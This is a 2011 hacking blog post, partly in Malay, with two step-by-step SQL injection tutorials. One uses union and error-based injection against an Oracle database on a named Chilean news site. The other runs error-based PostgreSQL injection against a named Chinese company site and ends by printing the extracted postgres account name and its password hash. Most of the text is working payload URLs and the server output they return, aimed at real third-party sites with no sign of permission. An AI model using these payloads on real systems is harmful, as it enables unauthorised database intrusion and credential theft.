Monday, May 30, 2011

Oracle Database Injection


So we gonna play with Oracle Database Injection
our target :
http://www3.inn.cl
First using Union Based injection

1 - Kita mulakan check vuln dgn letak single quote '
Code:
http://www3.inn.cl/noticias/index.php?id=2372'
jika ade vuln,ia akan keluarkan error :
Quote:
Warning: ociparse(): OCIParse: ORA-01756: quoted string not properly terminated in /home/www/html/inn/noticias/_index.php on line 5
Kita dapat lihat ORA-01756,dan dgn segera tahulah ini oracle injection kn?


2 - Kita cari bilangan column mcm biasa. order by 1-- sampai error
dan dari web ni,column yg ade = 9
3 - so kita teruskan dgn union injection kita
Code:
http://www3.inn.cl/noticias/index.php?id=2372 UNION SELECT 1,2,3,4,5,6,7,8,9
jika di sini tiada nombor column yg error  kluar..So kita lihat error dia.
Quote:Warning: ociexecute(): OCIStmtExecute: ORA-00923: FROM keyword not found where expected in /home/www/html/inn/noticias/_index.php on line 6

FROM keyword not found,bermaksud injection ni kita perlukan FROM. 
Utk rujukan :
Code:
http://pentestmonkey.net/blog/oracle-sql-injection-cheat-sheet/

Sebelum tu,kita perlukan null kan dulu semua nombor column sama mcm dlm posgresql injection.
Code:
http://www3.inn.cl/noticias/index.php?id=-2372 UNION SELECT null,null,null,null,null,null,null,null,null--

Dan utk mudahkan kita nk tau column mane bleh diinjek,tukarkan null kepada 0 satu demi satu.
dalam kes ni,column null pertama lepas letak 0 takde error,tp error wujud kalau pada column ke 2.
ini bermaksud,column kedua tu kita leh inject


4 - dlm tutorial nih kita just inject and extrac sampai version() je yer,yg lain2 korang test sdri GayFace
dari pentestmonkey,kita tgk ade 3 syntax utk cek version
Quote:SELECT banner FROM v$version WHERE banner LIKE 'Oracle%';
SELECT banner FROM v$version WHERE banner LIKE 'TNS%';
SELECT version FROM v$instance;


so kita just amik yg 1st sbg testing.
Code:
http://www3.inn.cl/noticias/index.php?id=-2372 UNION SELECT null,banner,null,null,null,null,null,null,null FROM v$version WHERE banner LIKE 'Oracle%'--
Quote:Oracle Database 10g Release 10.2.0.1.0 - 64bit Production
Image has been scaled down 22% (800x429). Click this bar to view original image (1022x547). Click image to open in new window.




So..dah berjaya... Smile
----------------------------------------------------------------------------------------------------------
 Kalau Error Base..kita biasa guna or 1=1 /or 1=2
1 or 1=utl_inaddr.get_host_address((SELECT banner FROM v$version WHERE banner LIKE 'Oracle%'))
function utl_inaddr.get_host_address hanya boleh digunakan kalau
oracle itu adalah version 10g ke bawah..kalau yg 11g kita perlu gunakan

Code:
1=ctxsys.drithsx.sn(1,(sql syntax))


Code:
http://www3.inn.cl/noticias/index.php?id=2372 or 1=utl_inaddr.get_host_address((SELECT banner FROM v$version WHERE banner LIKE 'Oracle%'))
Quote:Warning: ociexecute(): OCIStmtExecute: ORA-29257: host Oracle Database 10g Release 10.2.0.1.0 - 64bit Production unknown ORA-06512: at "SYS.UTL_INADDR", line 19 ORA-06512: at "SYS.UTL_INADDR", line 40 ORA-06512: at line 1 in /home/www/html/inn/noticias/_index.php on line 6
[Image: 41004395321842115849.png]


Credit to : p0pc0rn @tbd.my 


Error Based PosgreSQL Injection

This is a demo on how to attack a website with error based Posgresql Injection. I take from my 0day web apps that just published as an example.


our victim is
http://www.creatop.com.cn
try to put ' at the url.
Code:
http://www.creatop.com.cn/index.cfm?MenuID=80'
The output
Code:
ERROR: syntax error at or near "''"

When I try to use
Code:
http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=1
it will return TRUE page. while when i'm using
Code:
http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=0
FALSE page replied.

So, I know this is either blind sql or error based sql.
I try using error based method.

Code:
http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=cast(version() as int)
Owh Lucky!! it works! Posgresql!

So proceed to get the table name.
Same like we injecting other vulnerable website,posgresql is quite similar.In Posgresql error based,all sql query must be in this form
Code:
cast((your sql command/query) as int)
So, to get the table name we use cast((select table_name from information_schema.tables limit 1 offset 0) as int) what do we get??
Code:
ERROR: invalid input syntax for integer: "pg_type"
one of the table_name is pg_type"
We try to check other table_name by increasing the offset number.
So I know there is pg_user and pg_shadow table. I try to get the data from pg_shadow
Code:
http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=cast((select usename from pg_shadow limit 1 offset 0) as int)
Code:
ERROR: invalid input syntax for integer: "postgres"
the usename is postgres
How about the passwd??
Code:
http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=cast((select passwd from pg_shadow limit 1 offset 0) as int)
Code:
ERROR: invalid input syntax for integer: "md5caa5a31e69edef35ea15e2db062836a7"

there you are..we already get the passwd hash!
Then u can proceed what ever u want.
I will stop at here.Else you need to explore it yourself.

References
Code:
http://hackingexpose.blogspot.com/2009/04/postgresql-error-base-sql-injection.html
http://pentestmonkey.net/blog/postgres-sql-injection-cheat-sheet/

credit to : p0pc0rn